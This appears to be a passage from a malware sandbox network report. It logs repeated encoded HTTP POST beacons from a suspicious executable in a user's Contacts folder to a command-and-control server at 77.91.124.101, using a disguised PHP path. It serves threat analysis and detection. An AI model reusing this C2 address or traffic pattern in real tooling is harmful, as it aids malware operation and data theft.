                                                            Data Ascii: R]X\[S_[]WUWUXWZPRXEVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+5X<;=U$,$^#1?>P0&W'0-]:<,/&G''^)?
Nov 21, 2023 04:48:00.733994961 CET | 371 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 02 27 3f 38 10 21 33 34 0b 2b 3a 2d 50 2e 3d 3e 43 3f 0a 21 13 25 2e 28 5e 27 07 04 0d 3c 3f 02 5d 27 29 0d 0e 21 26 2b 00 29 30 21 5a 0c 1d 26 5e 36 3b 3b 57 3c 2e 3f 02 29 3d 2c 5b 31 32 24 06 3f 3d 3f 50 34 23 3b 5b 24 30 20 1b 2c 59 29 59 2e 16 0c 09 27 2c 0b 07 22 2d 23 5f 0c 14 24 0c 22 31 27 5b 37 30 39 08 36 24 37 04 23 37 37 1c 27 2e 23 08 32 38 3e 07 3f 28 0a 55 25 51 20 50 33 2a 2f 53 32 39 23 1e 29 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !'?8!34+:-P.=>C?!%.(^'<?]')!&+)0!Z&^6;;W<.?)=,[12$?=?P4#;[$0 ,Y)Y.',"-#_$"1'[7096$7#77'.#28>?(U%Q P3*/S29#):&T*+H6ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 77.91.124.101 | 80 | 192.168.2.5 | 49765 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:00.456012964 CET | 366 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Nov 21, 2023 04:48:00.658432961 CET | 368 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.658720016 CET | 370 | OUT | Data Raw: 57 5f 58 58 5b 5e 5a 50 5d 57 55 57 55 5c 57 50 50 5b 58 43 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XX[^ZP]WUWU\WPP[XCVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8<+==U<;7%#:5\<3=%$!.;?/Y8&G''^)/
Nov 21, 2023 04:48:00.863715887 CET | 371 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.5 | 49765 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:00.456012964 CET | 366 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.658432961 CET368INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.658720016 CET370OUTData Raw: 57 5f 58 58 5b 5e 5a 50 5d 57 55 57 55 5c 57 50 50 5b 58 43 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XX[^ZP]WUWU\WPP[XCVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8<+==U<;7%#:5\<3=%$!.;?/Y8&G''^)/
                                                            Nov 21, 2023 04:48:00.863715887 CET371INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            52 | 192.168.2.5 | 49766 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:01.192553997 CET | 372 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:01.389041901 CET | 372 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:01.389336109 CET | 375 | OUT | Data Raw: 57 5c 5d 5e 5b 5b 5a 5a 5d 57 55 57 55 5d 57 52 50 58 58 46 56 50 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]^[[ZZ]WUWU]WRPXXFVPW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(-^<8"W># /4(#>Q&=!'#=9("\<,8>&G''^)+
                                                            Nov 21, 2023 04:48:01.590692997 CET | 375 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:01 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            53 | 77.91.124.101 | 80 | 192.168.2.5 | 49767 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:01.912075996 CET | 376 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:02.110807896 CET | 376 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:02.111066103 CET | 378 | OUT | Data Raw: 52 5b 58 5c 5b 59 5a 59 5d 57 55 57 55 5c 57 51 50 5e 58 49 56 50 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[X\[YZY]WUWU\WQP^XIVPW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<(2T*3<,:#)](6R3>"P$0*."<;\/&G''^)/
                                                            Nov 21, 2023 04:48:02.314310074 CET | 379 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:01 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            54 | 192.168.2.5 | 49768 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:02.628360987 CET | 380 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:02.826001883 CET | 380 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:02.826369047 CET | 382 | OUT | Data Raw: 57 5a 5d 5c 5e 5d 5a 5f 5d 57 55 57 55 5d 57 56 50 5a 58 44 56 57 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZ]\^]Z_]WUWU]WVPZXDVWW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+!Y=+= 'Z;&[")&?&3V$.V:?/(->&G''^)+
                                                            Nov 21, 2023 04:48:03.029112101 CET | 383 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:02 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            55 | 77.91.124.101 | 80 | 192.168.2.5 | 49769 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:03.347954988 CET | 384 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:03.546896935 CET | 384 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:03.547147036 CET | 386 | OUT | Data Raw: 57 5f 58 50 5e 5e 5f 5e 5d 57 55 57 55 5d 57 52 50 52 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XP^^_^]WUWU]WRPRXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')2(+>S>#$/2_4^<*V$2R0)-;>X?4/&G''^)+
                                                            Nov 21, 2023 04:48:03.755608082 CET | 387 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:03 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            56 | 77.91.124.101 | 80 | 192.168.2.5 | 49770 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:04.080090046 CET | 387 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:04.278098106 CET | 388 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:04.278456926 CET | 390 | OUT | Data Raw: 57 58 5d 5a 5b 52 5a 5f 5d 57 55 57 55 5b 57 5a 50 53 58 44 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WX]Z[RZ_]WUWU[WZPSXDVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')81<.S* (/-7))\?9$[1&31.;:\+,;\,&G''^)3
                                                            Nov 21, 2023 04:48:04.481086016 CET | 391 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:04 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            57 | 77.91.124.101 | 80 | 192.168.2.5 | 49771 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:04.800623894 CET | 391 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:04.999392986 CET | 392 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:04.999623060 CET | 394 | OUT | Data Raw: 57 50 5d 5d 5b 58 5f 5b 5d 57 55 57 55 5a 57 51 50 5b 58 42 56 55 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]][X_[]WUWUZWQP[XBVUWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(!+*S> #_/"":< 9&."'..<;Y;&G''^)7
                                                            Nov 21, 2023 04:48:05.205761909 CET | 395 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:04 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            58 | 77.91.124.101 | 80 | 192.168.2.5 | 49772 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:05.520483971 CET | 395 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:05.718169928 CET | 396 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:05.718548059 CET398OUTData Raw: 57 5d 58 5c 5b 58 5f 59 5d 57 55 57 55 5b 57 54 50 53 58 41 56 5f 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X\[X_Y]WUWU[WTPSXAV_WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*6(>*;6#*(#%&-.00).-+#,&G''^)3
                                                            Nov 21, 2023 04:48:05.921027899 CET | 399 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:05 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            59 | 192.168.2.5 | 49773 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:05.950911999 CET | 399 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:06.152107000 CET | 400 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:06.152419090 CET402OUTData Raw: 57 50 5d 59 5b 52 5a 51 5d 57 55 57 55 5b 57 51 50 5c 58 42 56 53 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Y[RZQ]WUWU[WQP\XBVSWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'="<>V* ;"] :=X)#.Q$-"'0.W9+=?#Y->&G''^)3
                                                            Nov 21, 2023 04:48:06.358747005 CET | 405 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 05 26 3f 05 02 37 33 37 55 2b 2a 31 51 2d 00 0f 18 28 20 31 13 26 3d 19 07 27 07 21 54 3f 11 2b 01 30 00 2c 56 23 50 30 59 29 30 21 5a 0c 1d 25 07 36 38 3b 52 2b 3e 0e 59 28 2d 0e 18 26 0f 2f 1a 3c 3d 20 0a 34 0a 3b 58 26 30 3b 0b 2f 59 31 59 2f 38 35 1b 27 3c 2d 07 34 17 23 5f 0c 14 24 0b 23 22 3f 5f 34 0e 07 0d 22 37 30 59 20 24 2b 56 27 2d 30 1c 32 06 2d 17 3c 06 28 1e 32 09 24 13 30 04 27 55 26 3a 33 56 3f 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !&?737U+*1Q-( 1&='!T?+0,V#P0Y)0!Z%68;R+>Y(-&/<= 4;X&0;/Y1Y/85'<-4#_$#"?_4"70Y $+V'-02-<(2$0'U&:3V?:&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            6 | 77.91.124.101 | 80 | 192.168.2.5 | 49718 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:30.299001932 CET | 166 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:30.495738983 CET | 167 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:30.495970964 CET169OUTData Raw: 57 5f 58 5f 5b 5e 5f 5a 5d 57 55 57 55 5e 57 5b 50 58 58 46 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_X_[^_Z]WUWU^W[PXXFVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+;V= 4/4#+%'$ *9+6<;;&G''^)
                                                            Nov 21, 2023 04:47:30.699763060 CET | 170 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            60 | 192.168.2.5 | 49774 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:06.084899902 CET | 400 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:06.281615973 CET | 402 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:06.281907082 CET404OUTData Raw: 57 59 58 5a 5e 5e 5a 5e 5d 57 55 57 55 5a 57 5a 50 5d 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
